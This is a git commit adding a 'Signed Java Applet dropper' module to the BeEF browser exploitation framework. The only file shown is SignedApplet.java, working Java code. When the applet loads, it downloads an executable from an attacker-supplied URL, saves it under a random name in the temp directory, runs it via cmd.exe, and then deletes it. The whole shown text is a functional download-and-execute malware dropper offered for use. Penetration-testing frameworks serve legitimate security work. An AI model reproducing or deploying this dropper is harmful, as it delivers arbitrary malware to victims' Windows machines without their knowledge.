From antisnatchor with love. New module: Signed Java Applet dropper (win only for now).

2013-10-08 17:02:02 +01:00
parent 2c750670d7
commit b280d099f8
9 changed files with 195 additions and 0 deletions
--- a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
+++ b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
@@ -0,0 +1,87 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.applet.*;
+import java.awt.*;
+import java.io.*;
+import java.util.*;
+import java.net.URL;
+
+public class SignedApplet extends Applet {
+
+    public static String debug = "false";
+    public static String bin_url = "";
+    public static String bin_path = "";
+    public static boolean download = false;
+
+    public void init(){
+        bin_url = (String)getParameter("url");
+        String bin_rand_name = Long.toString(Math.abs((new Random()).nextLong()), 36);
+        bin_path = System.getProperty("java.io.tmpdir") + File.separator + bin_rand_name + ".exe";
+
+        // grab operating system -> not used atm
+        // TODO: make the applet compatible also with Linux/OSX
+        String os = System.getProperty("os.name").toLowerCase();
+        execute();
+    }
+
+    public SignedApplet(){
+        super();
+        SecurityManager sm = new SM();
+        System.setSecurityManager(sm);
+        return;
+    }
+
+    public static boolean download(){
+        boolean success = false;
+        try{
+            URL url = new URL(bin_url);
+            InputStream is = url.openStream();
+            BufferedInputStream isbuf = new BufferedInputStream(is);
+            File bin_out = new File(bin_path);
+            OutputStream out = new BufferedOutputStream(new FileOutputStream(bin_out));
+            byte[] buf = new byte[1024];
+            for (;;){
+                int bs = isbuf.read(buf);
+                if (bs <= 0) break;
+                out.write(buf, 0, bs);
+            }
+            out.flush();
+            out.close();
+            is.close();
+            success = true;
+            return success;
+        }catch(Exception e){
+            return success;
+        }
+    }
+
+    public static String execute() {
+        String result = "";
+        String command = "";
+        try{
+            boolean downloadOk = download();
+            System.out.println("Download [" + downloadOk + "] - bin_path [" + bin_path + "]");
+            result = "Download [" + downloadOk + "] - bin_path [" + bin_path + "]";
+
+            if(downloadOk){
+                // TODO: make the applet compatible also with Linux/OSX
+                command = "cmd.exe /c \"" + bin_path + "\"";
+                Process p = Runtime.getRuntime().exec(command);
+                p.waitFor();
+                /// delete dropped binary
+                new File(bin_path).delete();
+                result += "\n\nExecution OK.";
+            }else{
+                //downloading of dropper failed, catch error..
+                result = "Download error.";
+            }
+        }catch (Exception e) {
+            result = "Exception!!!: \n";
+        }
+        return result;
+    }
+}